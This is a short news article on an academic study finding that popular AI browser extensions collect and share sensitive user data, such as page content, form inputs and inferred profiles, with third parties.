This post is also available in:
עברית (Hebrew)
A new academic study has revealed that popular AI browser extensions are collecting and sharing sensitive user data, including medical records, financial details, and browsing activity, without sufficient safeguards in place. The findings raise serious concerns over privacy in the growing field of AI-powered web assistants.
Researchers from University College London and the Mediterranea University of Reggio Calabria conducted the first large-scale analysis of generative AI browser assistants, focusing on how these tools handle user data. Their results show extensive tracking and profiling occurring in the background of everyday online activity.
While these extensions offer valuable features such as content summarization, question answering, and web navigation, the study found that many of them quietly transmit full page content to external servers. In some cases, they even captured user inputs in forms, such as banking credentials or health information.
For their research, the team created a simulated user profile—described as a “rich millennial male from southern California who is interested in equestrian activities”—and engaged with several AI assistants while performing common web tasks. Tools analyzed included ChatGPT for Google, Copilot, Merlin, Sider, Monica, TinaMind, and Perplexity.
Most assistants shared user data with third parties or used it to build user profiles, sometimes inferring attributes like age, income, and interests. These profiles were used to personalize responses, even across different sessions. Notably, only Perplexity showed no signs of profiling or third-party data sharing.
Some tools continued collecting information even when users used private websites, such as health portals and government websites, violating expected privacy norms.
The research focused on U.S. usage, but experts believe many of these practices would likely breach privacy regulations under stricter frameworks such as Europe’s GDPR.
Researchers are now urging greater transparency and tighter regulation to ensure users understand what data is being collected, and to prevent invasive tracking by tools designed to assist rather than monitor.